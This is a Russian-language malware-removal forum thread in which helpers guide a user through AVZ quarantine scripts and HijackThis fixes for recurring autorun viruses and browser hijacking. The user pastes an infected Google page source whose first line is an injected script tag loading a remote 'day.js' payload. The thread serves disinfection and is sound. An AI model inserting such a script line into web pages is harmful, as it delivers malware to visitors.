-
Вложений: 3
Неисчезающие вири
Постоянно при запуске авира находит на всех дисках(кроме защищенных от записи) autorun.bat(BAT/Small.K batch virus),Autorun.exe(CC/UKMalw.LB sample),autorun.reg(TR/Winreg.AutoRun.A Trojan),autorun.vbs(VBS/Small.K VBS script virus),tel.xls.exe(W32/Sality.L).Я их удаляю, но при перезапуске они опять появляются. Кроме того при работе в интернете при переходе на любую страницу браузер сначала коннектит к какимто dt.tongji.cn.yahoo.com и js.tongji.cn.yahoo.com, и при этом жутко тормозит,идет много траффика ниезвестно куда, плюс еще не все страницы открываются. Надеюсь на вашу помощь:>
-
выполните скрипт ...
[code]
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('E:\autorun.wsh','');
QuarantineFile('D:\autorun.wsh','');
QuarantineFile('C:\autorun.wsh','');
QuarantineFile('C:\Program Files\Save Flash\SaveFlash.dll','');
QuarantineFile('C:\Program Files\Styler\TB\StylerTB.dll','');
QuarantineFile('C:\Program Files\Mario Forever Toolbar\v3.2.0.0\MarioForever_Toolbar.dll','');
QuarantineFile('wsctf.exe','');
DeleteService('Map35');
QuarantineFile('Map35.sys','');
QuarantineFile('c:\docume~1\admin\locals~1\temp\{b572ab79-5649-4d04-8531-7c70102b36b1}\blaero start orb.exe','');
DeleteFile('Map35.sys');
DeleteFile('C:\autorun.wsh');
DeleteFile('D:\autorun.wsh');
DeleteFile('E:\autorun.wsh');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
[/code]
пришлите карантин согласно приложения 3 правил ...
-
Спасибо. Скрипт выполнил, карантин выслал.
[size="1"][color="#666686"][B][I]Добавлено через 13 минут[/I][/B][/color][/size]
После нескольких перезагрузок все равно каждый раз находит какой-то day[1].js (JS/Dldr.Agent.4815) в папке C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\CCGXT2RQ
-
Очистите временные файлы,кеш браузера и повторите логи...
-
Вложений: 3
почистил темп и кеш, логи прилагаются
-
[QUOTE=fedoseew;261065]почистил темп и кеш[/QUOTE]Это нужно делать для каждой учетки отдельно.
Отключите
- ПК от интернета/локалки
- [B]Антивирус и Файрвол[/B].
- Системное востановление.
-[URL="http://virusinfo.info/showthread.php?t=4491"]Пофиксите[/URL]
[CODE]F2 - REG:system.ini: UserInit=userinit.exe,EXPLORER.EXE
R3 - URLSearchHook: (no name) - {83821C2B-32A8-4DD7-B6D4-44309A78E668} - (no file)
O4 - HKCU\..\Run: [wsctf.exe] wsctf.exe
[/CODE]
- [URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт[/URL]
[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('wsctf.exe','');
DeleteFile('wsctf.exe');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
[/CODE]
После перезагрузки:
- [url="http://virusinfo.info/showthread.php?t=10025"] Очистите [/url]темп-папки, кэш проводников и корзину.
- Закройте все программы, включая Антивирус и Файрвол, Оставьте запущенным [B]только Internet Explorer[/B]. Если он не запущен - запустите!!!
- Сделайте повторные логи по правилам.
- Включите Антвирус и Файрволл
- Подключите ПК к интернету/локалке
- Закачайте карантин [COLOR="Red"][B]по красной ссылке[/B][/COLOR] вверху темы.
- Прикрепите логи к новому сообщению.
Подумайте,нужны ли Вам все приложения, записанные в автозапуск. ПК будет работать лучше, если Вы 80% оттуда уберете.
Что толку например от этого
[CODE]O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re[B]1.4.2_06[/B]\bin\jusched.exe[/CODE]
если актуаьная версия Java [B]1.6_07[/B]?
И эти все - фтопку пофиксить.
[CODE]O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [mmtask] "C:\Program Files\Musicmatch\Musicmatch Jukebox\mmtask.exe"
O4 - HKLM\..\Run: [RivaTuner] "C:\Program Files\RivaTuner v2.0 RC 16.1\RivaTuner.exe" /T
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [VisualTooltip] C:\Program Files\VisualTooltip\VisualToolTip.exe
O4 - HKLM\..\Run: [Blaero Start Orb] C:\Program Files\Blaero Start Orb\Blaero Start Orb.exe
O4 - HKLM\..\Run: [Styler] C:\Program Files\Styler\Styler.exe
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\K-Lite Codec Pack\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SMSTray] C:\Program Files\Samsung\EmoDio\SMSTray.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
O4 - HKCU\..\Run: [Download Master] C:\Program Files\Download Master\dmaster.exe -autorun
O4 - HKCU\..\Run: [I.UA Checker] c:\program files\mi6\i.ua checker\iua_checker.exe
O4 - HKCU\..\Run: [Nokia.PCSync] "C:\Program Files\Nokia\Nokia PC Suite 7\PCSync2.exe" /NoDialog
O4 - HKCU\..\Run: [PC Suite Tray] "C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe[/CODE]
Если вдруг проблемы какие будут - можно восстановить из бекапа.
-
Вложений: 3
сделал все, кроме фикса вот этого, так как там еще много важного для меня
[QUOTE]И эти все - фтопку пофиксить.
Код:
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [mmtask] "C:\Program Files\Musicmatch\Musicmatch Jukebox\mmtask.exe"
O4 - HKLM\..\Run: [RivaTuner] "C:\Program Files\RivaTuner v2.0 RC 16.1\RivaTuner.exe" /T
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [VisualTooltip] C:\Program Files\VisualTooltip\VisualToolTip.exe
O4 - HKLM\..\Run: [Blaero Start Orb] C:\Program Files\Blaero Start Orb\Blaero Start Orb.exe
O4 - HKLM\..\Run: [Styler] C:\Program Files\Styler\Styler.exe
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\K-Lite Codec Pack\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SMSTray] C:\Program Files\Samsung\EmoDio\SMSTray.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
O4 - HKCU\..\Run: [Download Master] C:\Program Files\Download Master\dmaster.exe -autorun
O4 - HKCU\..\Run: [I.UA Checker] c:\program files\mi6\i.ua checker\iua_checker.exe
O4 - HKCU\..\Run: [Nokia.PCSync] "C:\Program Files\Nokia\Nokia PC Suite 7\PCSync2.exe" /NoDialog
O4 - HKCU\..\Run: [PC Suite Tray] "C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
Если вдруг проблемы какие будут - можно восстановить из бекапа. [/QUOTE]
Но все равно файрфокс коннектит к dt.tongji.cn.yahoo.com и js.tongji.cn.yahoo.com, и при каждом переходе на новую страницу авира ругается на day[1].js, как и после каждого перезапуска ПК.Логи прилагаются, карантин выслал
-
C:\Program Files\Mario Forever Toolbar\v3.2.0.0\MarioForever_Toolbar.dll возможно AdWare подождем что скажет вирлаб ... сделайте логи с запущенным лисом ...
-
Этот вирь как-то встраивает себя во все страницы!Причем иногда он работает ,а иногда нет.Вот например исходный код страницы гугла!Именно на этот day.js авира и орет!Причем на этом форуме не одного у меня такая проблема...и никто пока ее не решил( [CODE]<script language="javascript" SRC="http://v.freefl.info/day.js"></script> <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><style>body,td,a,p,.h{font-family:arial,sans-serif}.h{font-size:20px}.h{color:#3366cc}.q{color:#00c}.ts td{padding:0}.ts{border-collapse:collapse}.lnc:link,.lnc:visited{color:#00c}.pgtab,.pgtab:hover,.pgtabselected,.pgtabside{text-align:center;text-decoration:none;color:#00c;display:block;height:27px;float:left;overflow:hidden;background:url(/intl/ja/images/productlinktabs.png) no-repeat;padding-top:8px}.pgtab{width:130px;background-position:-274px 0}.pgtab:hover{width:130px;background-position:-144px 0}.pgtabselected{width:144px}.pgtabside{width:3px;background-position:-404px 0}.iconl{overflow:hidden;height:px;width:px;position:relative}#gbar{height:22px;padding-left:2px}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}#gbi,#gbs{background:#fff;left:0;position:absolute;top:24px;visibility:hidden;z-index:1000}#gbi{border:1px solid;border-color:#c9d7f1 #36c #36c #a2bae7;z-index:1001}#guser{padding-bottom:7px !important}#gbar,#guser{font-size:13px;padding-top:1px !important}@media all{.gb1,.gb3{height:22px;margin-right:.73em;vertical-align:top}#gbar{float:left}}.gb2{display:block;padding:.2em .5em}a.gb1,a.gb2,a.gb3{color:#00c !important}.gb2,.gb3{text-decoration:none}a.gb2:hover{background:#36c;color:#fff !important}</style><script>window.google={kEI:"NGmPSNzcFoOO7gW47dj7Dw",kEXPI:"18471,18537,18563",kHL:"ru"};
function sf(){document.f.q.focus()}
window.clk=function(b,c,d,e,f,g){if(document.images){var a=encodeURIComponent||escape;(new Image).src="/url?sa=T"+(c?"&oi="+a(c):"")+(d?"&cad="+a(d):"")+"&ct="+a(e)+"&cd="+a(f)+(b?"&url="+a(b.replace(/#.*/,"")).replace(/\+/g,"%2B"):"")+"&ei=NGmPSNzcFoOO7gW47dj7Dw"+g}return true};
window.gbar={};(function(){var b=window.gbar,f,h;b.qs=function(a){var c=window.encodeURIComponent&&(document.forms[0].q||"").value;if(c)a.href=a.href.replace(/([?&])q=[^&]*|$/,function(i,g){return(g||"&")+"q="+encodeURIComponent(c)})};function j(a,c){a.visibility=h?"hidden":"visible";a.left=c+"px"}b.tg=function(a){a=a||window.event;var c=0,i,g=window.navExtra,d=document.getElementById("gbi"),e=a.target||a.srcElement;a.cancelBubble=true;if(!f){f=document.createElement(Array.every||window.createPopup?"iframe":"div");f.frameBorder="0";f.src="#";d.parentNode.appendChild(f).id="gbs";if(g)for(i in g)d.insertBefore(g[i],d.firstChild).className="gb2";document.onclick=b.close}if(e.className!="gb3")e=e.parentNode;do c+=e.offsetLeft;while(e=e.offsetParent);j(d.style,c);f.style.width=d.offsetWidth+"px";f.style.height=d.offsetHeight+"px";j(f.style,c);h=!h};b.close=function(a){h&&b.tg(a)}})();</script></head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onload="sf();if(document.images){new Image().src='/images/nav_logo3.png'}" topmargin=3 marginheight=3><div id=gbar><nobr><b class=gb1>Веб</b> <a href="http://images.google.ru/imghp?hl=ru&tab=wi" onclick=gbar.qs(this) class=gb1>Картинки</a> <a href="http://maps.google.ru/maps?hl=ru&tab=wl" onclick=gbar.qs(this) class=gb1>Карты</a> <a href="http://news.google.ru/nwshp?hl=ru&tab=wn" onclick=gbar.qs(this) class=gb1>Новости</a> <a href="http://groups.google.ru/grphp?hl=ru&tab=wg" onclick=gbar.qs(this) class=gb1>Группы</a> <a href="http://mail.google.com/mail/?hl=ru&tab=wm" class=gb1>Gmail</a> <a href="http://www.google.ru/intl/ru/options/" onclick="this.blur();gbar.tg(event);return !1" class=gb3><u>ещё</u> <small>▼</small></a><div id=gbi><a></a> <a href="http://blogsearch.google.ru/?hl=ru&tab=wb" onclick=gbar.qs(this) class=gb2>Блоги</a> <a href="/dirhp?hl=ru&tab=wd" onclick=gbar.qs(this) class=gb2>Каталог</a> <div class=gb2><div class=gbd></div></div><a></a> <a href="http://ru.youtube.com/?hl=ru&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a> <a href="http://www.google.com/calendar/render?hl=ru&tab=wc" class=gb2>Календарь</a> <a href="http://picasaweb.google.ru/home?hl=ru&tab=wq" onclick=gbar.qs(this) class=gb2>Фотографии</a> <a href="http://docs.google.com/?hl=ru&tab=wo" class=gb2>Документы</a> <a href="http://www.google.ru/reader/view/?hl=ru&tab=wy" class=gb2>Reader</a> <a href="http://otvety.google.ru/otvety/?hl=ru&tab=w2" onclick=gbar.qs(this) class=gb2>Вопросы и ответы</a> <div class=gb2><div class=gbd></div></div><a></a> <a href="http://www.google.ru/intl/ru/options/" class=gb2>Все продукты »</a> </div></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div><div align=right id=guser style="font-size:84%;padding:0 0 4px" width=100%><nobr><a href="/url?sa=p&pref=ig&pval=3&q=http://www.google.ru/ig%3Fhl%3Dru%26source%3Diglk&usg=AFQjCNGA90yIbM1R8iZtlxuqENUj3kH4hw">Моя страница iGoogle</a> | <a href="https://www.google.com/accounts/Login?continue=http://www.google.ru/&hl=ru">Войти</a></nobr></div><center><script src="/extern_js/f/CgJydRICcnUrMAo4Ayw/sU0He6l7Lhs.js"></script><br clear=all id=lgpd><div align=left style="background:url(/intl/en_com/images/logo_plain.png) no-repeat;height:110px;width:276px" title="Google"><div nowrap style="color:#666;font-size:16px;font-weight:bold;left:208px;position:relative;top:78px">Россия</div></div><br><form action="/search" name=f><table cellpadding=0 cellspacing=0><tr valign=top><td width=25%> </td><td align=center nowrap><input name=hl type=hidden value=ru><input autocomplete="off" maxlength=2048 name=q size=55 title="Поиск в Google" value=""><br><input name=btnG type=submit value="Поиск в Google"><input name=btnI type=submit value="Мне повезёт!"></td><td nowrap width=25%><font size=-2> <a href=/advanced_search?hl=ru>Расширенный поиск</a><br> <a href=/preferences?hl=ru>Настройки</a><br> <a href=/language_tools?hl=ru>Языковые инструменты</a></font></td></tr><tr><td align=center colspan=3><font size=-1><span style="text-align:left"><input id=all type=radio name=lr value="" checked><label for=all> Поиск в Интернете </label><input id=il type=radio name=lr value="lang_ru"><label for=il> Поиск страниц на русском </label></span></font></td></tr></table></form><br><br><font size=-1><a href="/intl/ru/ads/">Рекламные программы</a> - <a href="/services/">Решения для предприятий</a> - <a href="/intl/ru/about.html">Всё о Google</a> - <a href=http://www.google.ru/intl/ru/jobs/ onmousedown="return clk(this.href,'promos','hppwebjob:ru_ru','pro','1','')">Работа в Google</a> - <a href=http://www.google.com/ncr>Google.com in English</a></font><p><font size=-2>©2008 - <a href="/intl/ru/privacy.html">Конфиденциальность</a></font></p></center></body><script>window.setTimeout('window.google.ac.install(document.f,document.f.q,"",false,"закрыть",true,"","")', 100)</script></html>[/CODE]
-
[QUOTE=fedoseew;261128]сделал все, кроме фикса вот этого, так как там еще много важного для меня [/QUOTE]
Потрясающе важная запись :D
[CODE]O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe[/CODE]
Уже давно версия 9 актуальна.
Ах, делайте, что хотите.
-
я говорил не все,только кое-что))))Тем более тот вирус даже после всех этих чисток не исчез(
-
Поищи на флешках autorun.vbs. Если найдется. то в карантин и прислать.
-
deamon.dll , c_126.nls ,css.jpg ,wow.jpg - попробуйте поискать ...
-
Итог лечения
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]2[/B][*]Обработано файлов: [B]14[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]
Page generated in 0.00569 seconds with 10 queries